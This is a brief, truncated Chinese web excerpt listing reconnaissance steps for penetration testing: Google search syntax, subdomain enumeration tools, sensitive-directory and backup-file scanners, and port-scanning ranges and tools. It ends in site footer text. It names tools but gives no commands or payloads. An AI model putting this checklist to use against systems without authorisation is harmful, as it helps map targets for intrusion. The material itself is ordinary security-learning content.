    信息收集1、谷歌语法:帮助我们更好的检索有用信息https://www.cnblogs.com/wyw-star/p/182930402、域名SubfinderOneforallSubdomain3、敏感目录7kbscan御剑IhoneyBakFileScanModify:git文件扫描4、端口分析1~655351~1w1w~3w3w以上大端口naabuyakitmsscan5......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99